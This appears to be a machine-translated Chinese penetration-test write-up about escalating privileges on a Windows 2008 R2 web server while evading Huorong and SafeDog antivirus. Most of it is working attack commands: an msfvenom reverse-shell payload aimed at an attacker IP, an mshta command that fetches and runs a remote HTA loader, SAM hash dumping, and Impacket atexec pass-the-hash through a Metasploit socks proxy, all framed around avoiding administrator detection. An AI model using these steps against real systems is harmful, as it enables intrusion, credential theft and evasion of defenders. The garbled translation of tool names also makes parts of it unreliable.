Title: Record a practical case of bypassing the turquoise security and power promotion

0x01 Introduction

A friend sent a website to help me check out the power-elevation. The server installed security software such as Guardian + Turfur + Security Dog. It looks really scary. He also tried a lot of commonly used power-elevation EXP, but all failed. Maybe it was because he lacked the ability to kill EXP. Of course, it might be that he had fixed these loopholes. He took the time to read it for him and wrote this record article. After obtaining the permission, I connected it with a Chinese kitchen knife, but it seemed to be intercepted. The prompt: The server returns an invalid or unrecognized response. I have encountered this situation many times before. Just change it to Godzilla and connect normally.

0x02 Collect basic information of server

Although my friend provided some information after the test, I am still used to reading it myself, because everyone has different knowledge points and practical experience. Only after reading it myself can I know which environments, WAF/AV and third-party software are installed, which ports are opened, how many patches have been put into, etc. so as to better test their system weaknesses. Target system: Windows 2008 R2 (6.1 Build 7601, Service Pack 1). Current permissions: iis apppool\****.com supports scripts: ASP, ASPX, PHP, and can directly execute system commands. Open ports: 21(ftp), 80(http), 135(rpc), 443(https), 445(smb), 801(http), 3306(mysql), 2121(G6FTP), 8021(G6FTP), 6588(hws), 58895(TermService) Process name: G6FTPServer.exe, G6FTPTray.exe, HwsHostPanel.exe, mysqld.exe, php-cgi.exe, SafeDogUpdateCenter.exe, CloudHelper.exe, SafeDogGuardCenter.exe, SafeDogGuardCenter.exe, SafeDogGuardHelper.exe, SafeDogGuardHelper.exe, SafeDogGuardHelper.exe, HipsTray.exe, HipsDaemon.exe, usysdiag.exe

The servers run: Turquoise, Guardian Host Master, Server Security Dog, MySQL database and G6FTP. You can try to increase the authority: Guardian Host Master, MySQL and G6FTP. However, during the process of raising the authority, you must pay attention to the detection and interception of Turquoise and Server Security Dog, so as to avoid being discovered by the administrator as much as possible.

0x03 Bypass Tinwood to get MSF session

Personally, we are used to raising power under MSF. First of all, we will find a way to get a session. Turfur will intercept the powershell execution and kill hta_server's hta file by default, so these two methods do not work here. Here we directly use the mshta whitelist to obtain the MSF session. First, execute the following command to generate shellcode and execute listening, and then replace the shellcode in the exp.hta file with MSF shellcode. [root@p1600778655 ~]# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=155.**.***.16 lport=443 -f raw /tmp/shellcode.bin[root@p1600778655 ~]# cat /tmp/shellcode.bin | base64 -w 0msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) set lport 443msf6 exploit(multi/handler) exploit

Then we use Python to enable a temporary web for remote calls on VPS, and then go to the ASPX Malaysia command execution function to execute the exp.hta file with mshta.exe included in the system and then go online. python -m SimpleHTTPServer 8888python3 -m http.server 8888

0x04 SAM registry key export hash

My friend has tested a lot of EXPs in the early stage. In addition, the Guardian Host Master is a higher version, and MySQL has also been demoted, so I will no longer test these conventional methods. You can still try G6FTP, but I am using another unconventional method. The principle is also very simple to directly use the method mentioned in the article 《西部数码云主机失败提权案例》. When the SAM registry key has Users or Everyone's read permission, you can use the hashdump module under MSF to export the hash. meterpreter getuidmeterpreter load powershellmeterpreter powershell_shellPS Get-Acl -Path HKLM:\SAM\SAM | Format-Listmeterpreter run post/windows/gather/hashdump

0x05 atexec enhances System permissions

The host hash has been exported using the SAM registry key permission problem, but it still faces some problems, such as: no clear text password, no hash cannot be cracked, no user cannot be added, etc. How should we conduct the next test when encountering this scenario? At this time, we can try to use the remote command execution tool that supports HASH delivery to execute system commands. Here we use atexec in the remote command execution function of the Impacket suite to demonstrate. Other tools that support hash delivery and utilization methods are as follows. Port 135: WMIcmd/sharpwmi/WMIHACKER/Sharp-WMIExec; Impacket: psexec(445)/wmiexec(135)/smbexec(445)/atexec(445); Utilization method: Local local execution, Socks4/5 proxy, Metasploit virtual routing table; here we first add the current MSF session to the virtual route, then use the socks_proxy module to open a socks5 proxy, modify the proxychains.conf configuration file, and finally use the proxychains proxy tool to execute atexec. meterpreter run get_local_subnetsmeterpreter run autoroute -s 59.***.***.0/255.255.255.0meterpreter bg

msf6 auxiliary(server/socks_proxy) set username testmsf6 auxiliary(server/socks_proxy) set password 123456msf6 auxiliary(server/socks_proxy) run Kali's proxychains configuration is /etc/proxychains.conf by default, and the proxychains4 configuration that is compiled and installed by itself is in the root directory /src/proxychains.conf. I won't explain how to modify it. There are examples in the configuration file. [root@p1600778655 src]# vi /srv/proxychains/src/proxychains.conf When using the proxychains proxy tool to execute atexec, the following error may occur, and no command execution echoes, but we can first use the Ping9o**mf.dnslog.cn command to see if the execution is successful. If DNSLog receives data, it means it is successful. [root@p1600778655 ~]# proxychains4 -f /srv/proxychains/src/proxychains.conf python3 /srv/impacket/examples/atexec.py -hashes :ebdccc154cadcda7f5ef0a2149274f3c administrator@59.***.***.230 'cmd /c ping 9o**mf.dnslog.cn' After confirming that the command execution is successful, we start another command terminal and enable MSF listening, and then use the proxychains proxy tool to execute atexec. Here we can get the target host SYSTEM after executing the exp.hta file used before. meterpreter run get_local_subnetsmeterpreter run autoroute -s 59.***.***.0/255.255.255.0meterpreter bgmsf6 auxiliary(server/socks_proxy) set username testmsf6 auxiliary(server/socks_proxy) set password 123456msf6 auxiliary(server/socks_proxy) run Pitfall Record-1: If the current MSF session is not added to the virtual route, even if the Socks5 proxy is turned on, the proxychains proxy tool cannot be used to execute atexec. The following error message will be reported, because the MSF's Socks module opens a Socks proxy on the VPS. It cannot communicate with the target port 445 before adding the virtual route. Unless the Socks proxy is turned on on the target host, and then the Socks enabled by the target can be connected locally to communicate with the target port 445. Pitfall record-2: Socks proxy traffic has been opened, but when using the proxychains proxy tool to execute atexec, the following error occurred, and no command execution echoes, and the file cannot be written if the whoami1.txt command is executed. Of course, this may be just an individual case in this environment, but we can judge whether the execution is successful by ping dnslog command.

0x06 Summary

1. Successfully connect to a sentence through Grass 2. Execute the systeminfo command to discover the directory windows2008r2 SP13. Execute the command whoami to discover the iis permission, execute netstat -ano, find 21, 80, 445, 801, 3306, and other ports open 4. By executing the command tasklist/svc, through online soft killing process comparison, it is found that there are guardians, turf, security dog protection software, as well as databases mysql and G6FTP5 in the target system. Execute the following command to generate shellcode and execute listening msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=155.124.145.16 lport=443 -f raw /tmp/shellcode.bin6.View shellcode.bin code and output code through base64 cat /tmp/shellcode.bin | base64 -w 0msf6 set payload windows/meterpreter/reverse_tcpmsf6 set lhost 155.124.145.16msf6 set lport 443msf6 exploit

7. Customize and create a new exp.hta, and then replace the shellcode in the exp.hta file with the shellcode of MSF. script language='VBScript'Dim binary:binary='rundll32.exe'dim code:code='shecode.bin content base64'8. Then use Python on VPS to enable a temporary web for remote call to python -m SimpleHTTPServer 8888python3 -m http.server 88889. Upload APX Malaysia through Grass, and execute cmdpath:c:\windows\system32\cmd.exeargument:/c mshta http://155.124.145.16/exp.hta10. When the SAM registry key has Users or Everyone's read permission, you can use the hashdump module under MSF to export the hash. meterpreter getuidmeterpreter load powershellmeterpreter powershell_shellPS Get-Acl -Path HKLM:\SAM\SAM | Format-Listmeterpreter run post/windows/gather/hashdump11. The host hash has been exported using the SAM registry key permission issue, but it cannot be decrypted 12. Here we first add the current MSF session to the virtual route meterpreter run get_local_subnetsmeterpreter run autoroute -s 59.***.***.0/255.255.255.0meterpreter bg13. Use the socks_proxy module to enable a socks5 proxy. msf6 auxiliary(server/socks_proxy) set username testmsf6 auxiliary(server/socks_proxy) set password 123456msf6 auxiliary(server/socks_proxy) run14.Kali's proxychains configuration is in /etc/proxychains.conf by default, and the proxychains4 configuration compiled and installed by itself is in /src/proxychains.conf in the root directory. I won't explain how to modify it. There are examples in the configuration file.

[root@p1600778655 src]# vi /srv/proxychains/src/proxychains.conf15. When using the proxychains proxy tool to execute atexec, the following error may occur, and no command execution echoes, but we can first use the Ping 9o**mf.dnslog.cn command to see if the execution is successful. If DNSLog receives data, it means that it is successful proxychains4 -f /srv/proxychains/src/proxychains.conf python3 /srv/impacket/examples/atexec.py -hashes :ebdccc154cadcda7f5ef0a2149274f3c administrator@59.***.***.***.230 'cmd /c ping 9o**mf.dnslog.cn'16. Start another command terminal to enable MSF listening, and then use the proxychains proxy tool to execute atexec. Here you can get the target host SYSTEMmsf6 auxiliary(server/socks_proxy) sessions -i 1meterpreter run get_local_subnetsmeterpreter run autoroute -s 59.***.***.0/255.255.255.0meterpreter bgmsf6 auxiliary(server/socks_proxy) set username testmsf6 auxiliary(server/socks_proxy) set password 123456msf6 auxiliary(server/socks_proxy) run original link: https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==mid=2247488543idx=1sn=0e300f65f1425e035fcd8cdb9f3dd38cchksm=cfa6b00cf8d1391aeaae7cb2e7839f041e4c1264df495cbc5d91963820ca617872c95758e063scene=178cur_album_id=1553386251775492098#rd